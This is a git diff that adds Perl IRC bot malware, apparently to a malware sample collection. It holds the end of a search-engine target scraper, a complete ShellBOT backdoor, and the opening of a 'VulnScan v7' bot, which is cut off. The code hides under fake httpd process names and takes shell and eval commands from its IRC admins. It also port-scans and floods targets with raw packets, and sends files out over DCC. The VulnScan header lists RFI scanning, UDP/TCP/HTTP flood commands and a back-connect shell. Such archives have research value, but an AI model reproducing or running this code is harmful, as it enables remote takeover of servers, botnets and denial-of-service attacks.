+while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
+my $k=$3;
+$k=~s/[\"\ ]//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub askb(){
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=10)
+{
+my $Ask=("http://de.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
+my $Res=query($Ask);
+while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
+my $k=$3;
+$k=~s/[\"\ ]//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub links()
+{
+my @l;
+my $link=$_[0];
+my $host=$_[0];
+my $hdir=$_[0];
+$hdir=~s/(.*)\/[^\/]*$/\1/;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$host.="/";
+$link.="/";
+$hdir.="/";
+$host=~s/\/\//\//g;
+$hdir=~s/\/\//\//g;
+$link=~s/\/\//\//g;
+push(@l,$link,$host,$hdir);
+return @l;
+}
+
+sub geths(){
+my $host=$_[0];
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+return $host;
+}
+
+sub os(){
+my $sito=$_[0];
+my $Res=query($sito);
+my $type;
+my $free;
+my $str;
+while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){
+$type=$1;
+}
+while($Res=~m/<br>Free:(.+?)\<br>/g){
+$free=$1;
+}
+$str=$type.",".$free;
+return $str;
+}
+
+sub key(){
+my $chiave=$_[0];
+$chiave =~ s/ /\+/g;
+$chiave =~ s/:/\%3A/g;
+$chiave =~ s/\//\%2F/g;
+$chiave =~ s/&/\%26/g;
+$chiave =~ s/\"/\%22/g;
+$chiave =~ s/,/\%2C/g;
+$chiave =~ s/\\/\%5C/g;
+return $chiave;
+}
+
+sub query($){
+my $url=$_[0];
+$url=~s/http:\/\///;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host=~s/href=\"?http:\/\///;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query=~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+close($sock);
+};
+return $page;
+}
+
+sub unici{
+my @unici = ();
+my %visti = ();
+foreach my $elemento ( @_ )
+{
+next if $visti{ $elemento }++;
+push @unici, $elemento;
+}
+return @unici;
+}
+
+sub http_query($){
+my ($url) = @_;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host =~ s/href=\"?http:\/\///;
+$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query =~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+local $SIG{ALRM} = sub { die "1";};
+alarm 10;
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+alarm 0;
+close($sock);
+};
+return $page;
+}
+}
+
+##################################################
+# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ	 #
+# 	  www.AnakDompu.by.ru		 	 #
+#	     Created By Shinchi			 #
+#		 #AnakDompu			 #
+#		irc.dal.net			 #
+##################################################
diff --git a/Perl/Backdoor.Perl.Shellbot.a b/Perl/Backdoor.Perl.Shellbot.a
new file mode 100644
index 00000000..4d287ff9
--- /dev/null
+++ b/Perl/Backdoor.Perl.Shellbot.a
@@ -0,0 +1,665 @@
+#
+#  ShellBOT - Atrix Team
+#
+#   0ldW0lf - oldwolf@atrix-team.org
+#           - www.atrix-team.org
+#           - www.atrix.cjb.net
+#
+# modificado por poerschke 
+# irc.gigachat.net #spykids
+#
+################ CONFIGURACAO #################################################################
+my $processo = "/hsphere/shared/apache/bin/httpd -DSSL"; # Nome do processo que vai aparece no ps       #
+#----------------------------------------------################################################
+my $linas_max="10";                             # Evita o flood :) depois de X linhas         #
+#----------------------------------------------################################################
+my $sleep="4";                                 # ele dorme X segundos                         #
+##################### IRC #####################################################################
+@adms=("poerschke","_CaKe_");                       # Nick do administrador                        #
+#----------------------------------------------################################################
+my @canais=("#perl");                         # Caso haja senha ("#canal :senha")            #
+#----------------------------------------------################################################
+my $nick="spykids";	                       # Nick do bot. Caso esteja em uso vai aparecer #
+                                               # aparecer com numero radonamico no final      #
+#----------------------------------------------################################################
+my $ircname = "rox";                     # User ID                                      #
+#----------------------------------------------################################################
+chop (my $realname = `uname -a`);              # Full Name                                    #
+#----------------------------------------------################################################
+$servidor="irc.gigachat.net" unless $servidor;  # Servidor de irc que vai ser usado            #
+                                               # caso nуo seja especificado no argumento      #
+#----------------------------------------------################################################
+my $porta="6667";	                       # Porta do servidor de irc                     #
+################ ACESSO A SHELL ###############################################################
+my $secv = 1;	                               # 1/0 pra habilita/desabilita acesso a shell   #
+###############################################################################################
+
+my $VERSAO = "0.2";
+
+$SIG{"INT"} = "IGNORE";
+$SIG{"HUP"} = "IGNORE";
+$SIG{"TERM"} = "IGNORE";
+$SIG{"CHLD"} = "IGNORE";
+$SIG{"PS"} = "IGNORE";
+
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+
+#############################
+#  B0tchZ na veia ehehe :P  #
+#############################
+
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == "1") {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+  } else {
+      print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+   my $meunick = $_[0];
+   my $servidor_con = $_[1];
+   my $porta_con = $_[2];
+
+   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
+   if (defined($IRC_socket)) {
+     $IRC_cur_socket = $IRC_socket;
+
+     $IRC_socket->autoflush(1);
+     $sel_cliente->add($IRC_socket);
+
+     $irc_servers{$IRC_cur_socket}{"host"} = "$servidor_con";
+     $irc_servers{$IRC_cur_socket}{"porta"} = "$porta_con";
+     $irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
+     $irc_servers{$IRC_cur_socket}{"meuip"} = $IRC_socket->sockhost;
+     nick("$meunick");
+     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+     sleep 1;
+   }
+
+}
+my $line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+   delete($irc_servers{""}) if (defined($irc_servers{""}));
+   &DCC::connections;
+   my @ready = $sel_cliente->can_read(0);
+   next unless(@ready);
+   foreach $fh (@ready) {
+     $IRC_cur_socket = $fh;
+     $meunick = $irc_servers{$IRC_cur_socket}{"nick"};
+     $nread = sysread($fh, $msg, 4096);
+     if ($nread == 0) {
+        $sel_cliente->remove($fh);
+        $fh->close;
+        delete($irc_servers{$fh});
+     }
+     @lines = split (/\n/, $msg);
+
+     for(my $c=0; $c<= $#lines; $c++) {
+       $line = $lines[$c];
+       $line=$line_temp.$line if ($line_temp);
+       $line_temp="";
+       $line =~ s/\r$//;
+       unless ($c == $#lines) {
+         parse("$line");
+       } else {
+           if ($#lines == 0) {
+             parse("$line");
+           } elsif ($lines[$c] =~ /\r$/) {
+               parse("$line");
+           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse("$line");
+           } else {
+               $line_temp = $line;
+           }
+       }
+      }
+   }
+}
+
+
+ 
+sub parse {
+   my $servarg = shift;
+   if ($servarg =~ /^PING \:(.*)/) {
+     sendraw("PONG :$1");
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+       my $pn=$1; my $onde = $4; my $args = $5;
+       if ($args =~ /^\001VERSION\001$/) {
+         notice("$pn", "\001VERSION ShellBOT-$VERSAO por 0ldW0lf\001");
+       }
+       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
+         if ($onde eq "$meunick"){
+           shell("$pn", "$args");
+         }
+         if ($args =~ /^(\Q$meunick\E|\!atrix)\s+(.*)/ ) {
+            my $natrix = $1;
+            my $arg = $2;
+            if ($arg =~ /^\!(.*)/) {
+              ircase("$pn","$onde","$1") unless ($natrix eq "!atrix" and $arg =~ /^\!nick/);
+            } elsif ($arg =~ /^\@(.*)/) {
+                $ondep = $onde;
+                $ondep = $pn if $onde eq $meunick;
+                bfunc("$ondep","$1");
+            } else {
+                shell("$onde", "$arg");
+            }
+         } 
+       }
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc($meunick)) {
+         $meunick=$4; 
+         $irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
+       }
+   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+       nick("$meunick".int rand(9999));
+   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       $meunick = $2;
+       $irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
+       $irc_servers{$IRC_cur_socket}{"nome"} = "$1";
+       foreach my $canal (@canais) {
+         sendraw("JOIN $canal");
+       }
+   }
+}
+
+sub bfunc {
+  my $printl = $_[0];
+  my $funcarg = $_[1];
+  if (my $pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if ($funcarg =~ /^portscan (.*)/) {
+             my $hostip="$1";
+             my @portas=( 44464, 4444, 14589, 666, 6666, 6968, 26092, 530, 46256, 31337,
+             2222, 3879, 30464, 40193, 36864, 33270, 36864, 40193, 30464,
+             8008, 1234, 6969, 7788, 1524, 10000, 12321, 43690, 3333,
+             9999, 8975, 16705, 2313, 21317, 36864, 13330, 58821, 6682, 5678,
+             45295, 65535, 26112, 7512, 24876, 9191, 5321, 50766, 1492, 12345,
+             12346, 6969, 6970, 12666, 1666, 80, 21, 23, 25, 110, 5252, 9988, 
+             41254, 5074, 139, 44123);
+             my (@aberta, %porta_banner);
+             foreach my $porta (@portas)  {
+                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => "tcp", Timeout => 4);
+                if ($scansock) {
+                   push (@aberta, $porta);
+                   $scansock->close;
+                }
+             }
+
+             if (@aberta) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
+             } else {
+                 sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada"); 
+             }
+           }
+
+
+
+
+	     if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
+             my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
+             $dtime = 1 if $dtime == 0;
+             my %bytes;
+             $bytes{igmp} = $2 * $pacotes{igmp};
+             $bytes{icmp} = $2 * $pacotes{icmp};
+             $bytes{o} = $2 * $pacotes{o};
+             $bytes{udp} = $2 * $pacotes{udp};
+             $bytes{tcp} = $2 * $pacotes{tcp};
+            
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} +  $pacotes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Mщdia de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
+
+
+           }
+           exit;
+       }
+  }
+}
+ 
+sub ircase {
+  my ($kem, $printl, $case) = @_;
+
+  if ($case =~ /^entrar (.*)/) {
+     j("$1");
+   } 
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+   if ($case =~ /^rejoin\s+(.*)/) {
+      my $chan = $1;
+      if ($chan =~ /^(\d+) (.*)/) {
+        for (my $ca = 1; $ca <= $1; $ca++ ) {
+          p("$2");
+          j("$2");
+        }
+      } else {
+          p("$chan");
+          j("$chan");
+      }
+   }
+   if ($case =~ /^msg\s+(\S+) (.*)/) {
+      msg("$1", "$2");
+   }
+   
+   if ($case =~ /^nick (.*)/) {
+      nick("$1");
+   }
+   if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
+       conectar("$2", "$1", 6667);
+   }
+   if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
+      DCC::SEND("$1", "$2");
+   }
+   if ($case =~ /^raw (.*)/) {
+      sendraw("$1");
+   }
+   if ($case =~ /^eval (.*)/) {
+     eval "$1";
+   }
+}
+sub shell {
+  return unless $secv;
+  my $printl=$_[0];
+  my $comando=$_[1];
+  if ($comando =~ /cd (.*)/) {
+    chdir("$1") || msg("$printl", "Diertєrio inexistente!");
+    return;
+  } 
+  elsif ($pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`$comando 2>&1 3>&1`;
+           my $c=0;
+           foreach my $linha (@resp) {
+             $c++;
+             chop $linha;
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+             if ($c == "$linas_max") {
+               $c=0;
+               sleep $sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+
+#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
+sub attacker {
+  my $iaddr = inet_aton($_[0]);
+  my $msg = "B" x $_[1];
+  my $ftime = $_[2];
+  my $cp = 0;
+  my (%pacotes);
+  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+  
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+  return(undef) if $cp == 4;
+  my $itime = time;
+  my ($cur_time);
+  while ( 1 ) {
+     for (my $porta = 1; $porta <= 65535; $porta++) {
+       $cur_time = time - $itime;
+       last if $cur_time >= $ftime;
+       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+       # DoS ?? :P
+       for (my $pc = 3; $pc <= 255;$pc++) {
+         next if $pc == 6;
+         $cur_time = time - $itime;
+         last if $cur_time >= $ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
+       }
+     }
+     last if $cur_time >= $ftime;
+  }
+  return($cur_time, %pacotes);
+}
+
+
+
+#############
+#  ALIASES  #
+#############
+
+sub action {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
+}
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+sub msg {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :$_[1]");
+}  
+
+sub notice {
+   return unless $#_ == 1;
+   sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +o $_[1]");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -o $_[1]");
+}
+sub hop {
+    return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub dehop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub voice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +v $_[1]");
+}
+sub devoice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -v $_[1]");
+}
+sub ban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +b $_[1]");
+}
+sub unban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -b $_[1]");
+}
+sub kick {
+   return unless $#_ == 1;
+   sendraw("KICK $_[0] $_[1] :$_[2]");
+}
+
+sub modo {
+   return unless $#_ == 0;
+   sendraw("MODE $_[0] $_[1]");
+}
+sub mode { modo(@_); }
+
+sub j { &entrar(@_); }
+sub entrar {
+   return unless $#_ == 0;
+   sendraw("JOIN $_[0]");
+}
+sub p { part(@_); }
+sub part {sendraw("PART $_[0]");}
+
+sub nick {
+  return unless $#_ == 0;
+  sendraw("NICK $_[0]");
+}
+
+sub invite {
+   return unless $#_ == 1;
+   sendraw("INVITE $_[1] $_[0]");
+}
+sub topico {
+   return unless $#_ == 1;
+   sendraw("TOPIC $_[0] $_[1]");
+}
+sub topic { topico(@_); }
+
+sub whois {
+  return unless $#_ == 0;
+  sendraw("WHOIS $_[0]");
+}
+sub who {
+  return unless $#_ == 0;
+  sendraw("WHO $_[0]");
+}
+sub names {
+  return unless $#_ == 0;
+  sendraw("NAMES $_[0]");
+}
+sub away {
+  sendraw("AWAY $_[0]");
+}
+sub back { away(); }
+sub quit {
+  sendraw("QUIT :$_[0]");
+}
+
+
+
+# DCC
+package DCC;
+
+sub connections {
+   my @ready = $dcc_sel->can_read(1);
+#   return unless (@ready);
+   foreach my $fh (@ready) {
+     my $dcctipo = $DCC{$fh}{tipo};
+     my $arquivo = $DCC{$fh}{arquivo};
+     my $bytes = $DCC{$fh}{bytes};
+     my $cur_byte = $DCC{$fh}{curbyte};
+     my $nick = $DCC{$fh}{nick};
+
+     my $msg;
+     my $nread = sysread($fh, $msg, 10240);
+
+     if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
+        $DCC{$fh}{status} = "Cancelado";
+        $DCC{$fh}{ftime} = time;
+        $dcc_sel->remove($fh);
+        $fh->close;
+        next;
+     }
+
+     if ($dcctipo eq "get") {
+        $DCC{$fh}{curbyte} += length($msg);
+
+        my $cur_byte = $DCC{$fh}{curbyte};
+
+        open(FILE, ">> $arquivo");
+        print FILE "$msg" if ($cur_byte <= $bytes);
+        close(FILE);
+
+        my $packbyte = pack("N", $cur_byte);
+        print $fh "$packbyte";
+
+        if ($bytes == $cur_byte) {
+           $dcc_sel->remove($fh);
+           $fh->close;
+           $DCC{$fh}{status} = "Recebido";
+           $DCC{$fh}{ftime} = time;
+           next;
+        }
+     } elsif ($dcctipo eq "send") {
+          my $send = $fh->accept;
+          $send->autoflush(1);
+          $dcc_sel->add($send);
+          $dcc_sel->remove($fh);
+          $DCC{$send}{tipo} = "sendcon";
+          $DCC{$send}{itime} = time;
+          $DCC{$send}{nick} = $nick;
+          $DCC{$send}{bytes} = $bytes;
+          $DCC{$send}{curbyte} = 0;
+          $DCC{$send}{arquivo} = $arquivo;
+          $DCC{$send}{ip} = $send->peerhost;
+          $DCC{$send}{porta} = $send->peerport;
+          $DCC{$send}{status} = "Enviando";
+
+          #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
+          open(FILE, "< $arquivo");
+          my $fbytes;
+          read(FILE, $fbytes, 1024);
+          print $send "$fbytes";
+          close FILE;
+#          delete($DCC{$fh});
+     } elsif ($dcctipo eq "sendcon") {
+          my $bytes_sended = unpack("N", $msg);
+          $DCC{$fh}{curbyte} = $bytes_sended;
+          if ($bytes_sended == $bytes) {
+             $fh->close;
+             $dcc_sel->remove($fh);
+             $DCC{$fh}{status} = "Enviado";
+             $DCC{$fh}{ftime} = time;
+             next;
+          }
+          open(SENDFILE, "< $arquivo");
+          seek(SENDFILE, $bytes_sended, 0);
+          my $send_bytes;
+          read(SENDFILE, $send_bytes, 1024);
+          print $fh "$send_bytes";
+          close(SENDFILE);
+     }
+   }
+}
+
+
+sub SEND {
+  my ($nick, $arquivo) = @_;
+  unless (-r "$arquivo") {
+    return(0);
+  }
+ 
+  my $dccark = $arquivo;
+  $dccark =~ s/[.*\/](\S+)/$1/;
+
+  my $meuip = $::irc_servers{"$::IRC_cur_socket"}{"meuip"};
+  my $longip = unpack("N",inet_aton($meuip));
+
+  my @filestat = stat($arquivo);
+  my $size_total=$filestat[7];
+  if ($size_total == 0) {
+     return(0);
+  }
+
+  my ($porta, $sendsock);
+  do {
+    $porta = int rand(64511);
+    $porta += 1024;
+    $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => "tcp") and $dcc_sel->add($sendsock);
+  } until $sendsock;
+
+  $DCC{$sendsock}{tipo} = "send";
+  $DCC{$sendsock}{nick} = $nick;
+  $DCC{$sendsock}{bytes} = $size_total;
+  $DCC{$sendsock}{arquivo} = $arquivo;
+
+
+  &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
+
+}
+
+sub GET {
+  my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
+  return(0) if (-e "$arquivo");
+  if (open(FILE, "> $arquivo")) {
+     close FILE;
+  } else { 
+    return(0); 
+  }
+
+  my $dccip=fixaddr($dcclongip);
+  return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
+  my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
+  $dccsock->autoflush(1);
+  $dcc_sel->add($dccsock);
+  $DCC{$dccsock}{tipo} = "get";
+  $DCC{$dccsock}{itime} = time;
+  $DCC{$dccsock}{nick} = $nick;
+  $DCC{$dccsock}{bytes} = $bytes;
+  $DCC{$dccsock}{curbyte} = 0;
+  $DCC{$dccsock}{arquivo} = $arquivo;
+  $DCC{$dccsock}{ip} = $dccip;
+  $DCC{$dccsock}{porta} = $dccporta;
+  $DCC{$dccsock}{status} = "Recebendo";
+}
+
+# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
+sub Status {
+  my $socket = shift;
+  my $sock_tipo = $DCC{$socket}{tipo};
+  unless (lc($sock_tipo) eq "chat") {
+    my $nick = $DCC{$socket}{nick};
+    my $arquivo = $DCC{$socket}{arquivo};
+    my $itime = $DCC{$socket}{itime};
+    my $ftime = time;
+    my $status = $DCC{$socket}{status};
+    $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
+
+    my $d_time = $ftime-$itime;
+
+    my $cur_byte = $DCC{$socket}{curbyte};
+    my $bytes_total =  $DCC{$socket}{bytes};
+
+    my $rate = 0;
+    $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
+    my $porcen = ($cur_byte*100)/$bytes_total;
+
+    my ($r_duv, $p_duv);
+    if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $r_duv = $3; $r_duv++ if $4 >= 5;
+       $rate = "$1\.$2"."$r_duv";
+    }
+    if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $p_duv = $3; $p_duv++ if $4 >= 5;
+       $porcen = "$1\.$2"."$p_duv";
+    }
+    return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
+  }
+
+
+  return(0);
+}
+
+
+# esse "sub fixaddr" daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
+sub fixaddr {
+    my ($address) = @_;
+
+    chomp $address;     # just in case, sigh.
+    if ($address =~ /^\d+$/) {
+        return inet_ntoa(pack "N", $address);
+    } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
+        return $address;
+    } elsif ($address =~ tr/a-zA-Z//) {                    # Whee! Obfuscation!
+        return inet_ntoa(((gethostbyname($address))[4])[0]);
+    } else {
+        return;
+    }
+
+}
diff --git a/Perl/Backdoor.Perl.Shellbot.aa b/Perl/Backdoor.Perl.Shellbot.aa
new file mode 100644
index 00000000..475f2562
--- /dev/null
+++ b/Perl/Backdoor.Perl.Shellbot.aa
@@ -0,0 +1,611 @@
+# VulnScan v7 -Final- By Morgan
+#
+# Note:
+# DO NOT REMOVE COPYRIGHTS ...
+#
+# |_|0|_|
+# |_|_|0|
+# |0|0|0|
+#
+# New functions : 
+# Anti-Clone l33t
+# Fixed Print on Infected Boxes 
+# Easy Configuration 
+# l33t Color
+# BackConnect function (Usage: botname @back IP port)
+#
+#
+# Scan command : 
+# !morgan !eval @gstring='google%20dork';
+# !morgan @rfiscan vulnfile.php?vulnvar=
+#
+# DDoS commands :
+# Udp : !morgan @udpflood IP packet-size time
+# Tcp : !morgan @tcpflood IP port time
+# Http: !morgan @httpflood www.website.com time 
+# 
+# Greets to :
+# 
+# All #Morgan users... 
+#
+#
+# Enjoy the bot ....
+# /Morgan
+
+use HTTP::Request;
+use LWP::UserAgent;
+
+################ V7 CONFIGURATION #############################################################
+my $processo = 'httpd -DSL -DSL2';             # Fake process name for the bot                #
+if (`ps uxw` =~ /httpd -DSL -DSL2/)            # (CHANGE IT!!!)                               #
+{                                              #                                              #
+exit;                                          #                                              #
+}                                              #                                              #
+###############################################################################################
+my $linas_max='8';                             # Avoid Flood                                  #
+###############################################################################################
+my $sleep='5';                                 # sleep time                                   #
+##################### IRC #####################################################################
+my @adms=("FabioMatador","dann123");
+my @hostauth=("imbanaco2.att.net.co");                           # Administrator Nickname                 #
+###############################################################################################
+my @canais=("#timao.eu");                        # Channel ..if  password -> ("#channel :pass") #
+###############################################################################################
+my $nick='efut';                             # Nick prefix of the bot example :             #
+                                               # vs[v7] = vs[v7]-718727                       #
+###############################################################################################
+my $ircname = 'Dt Script';                      # Identd of the bot                            #
+###############################################################################################
+chop (my $realname = `uname -a`);              # Full Name                                    #
+###############################################################################################
+$servidor='stockholm.se.quakenet.org' unless $servidor; # Server IRC of the bot                        #
+###############################################################################################
+my $porta='6667';                              # Server PORT                                  #
+################ CMD ##########################################################################
+my @cmdgif='http://fabiocpv.by.ru/aa.txt'; # If you change this cmd must be same as:#
+                                                     # http://myspace.si/images/sad.gif       #
+###############################################################################################
+
+my $VERSAO = 'v7';
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+  } else {
+      print $IRC_cur_socket "$_[0]\n";
+  }
+}
+# MORGAN OWNED YOUR BOX 
+# 
+# morgan.rx@gmail.com
+sub conectar {
+   my $meunick = $_[0];
+   my $servidor_con = $_[1];
+   my $porta_con = $_[2];
+
+   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
+   if (defined($IRC_socket)) {
+     $IRC_cur_socket = $IRC_socket;
+
+     $IRC_socket->autoflush(1);
+     $sel_cliente->add($IRC_socket);
+
+     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+     nick("$meunick");
+     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+     sleep 1;
+   }
+}
+my $line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+   delete($irc_servers{''}) if (defined($irc_servers{''}));
+   my @ready = $sel_cliente->can_read(0);
+   next unless(@ready);
+   foreach $fh (@ready) {
+     $IRC_cur_socket = $fh;
+     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+     $nread = sysread($fh, $msg, 4096);
+     if ($nread == 0) {
+        $sel_cliente->remove($fh);
+        $fh->close;
+        delete($irc_servers{$fh});
+     }
+     @lines = split (/\n/, $msg);
+
+     for(my $c=0; $c<= $#lines; $c++) {
+       $line = $lines[$c];
+       $line=$line_temp.$line if ($line_temp);
+       $line_temp='';
+       $line =~ s/\r$//;
+       unless ($c == $#lines) {
+         parse("$line");
+       } else {
+           if ($#lines == 0) {
+             parse("$line");
+           } elsif ($lines[$c] =~ /\r$/) {
+               parse("$line");
+           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse("$line");
+           } else {
+               $line_temp = $line;
+           }
+       }
+      }
+   }
+}
+
+sub parse {
+   my $servarg = shift;
+   if ($servarg =~ /^PING \:(.*)/) {
+     sendraw("PONG :$1");
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
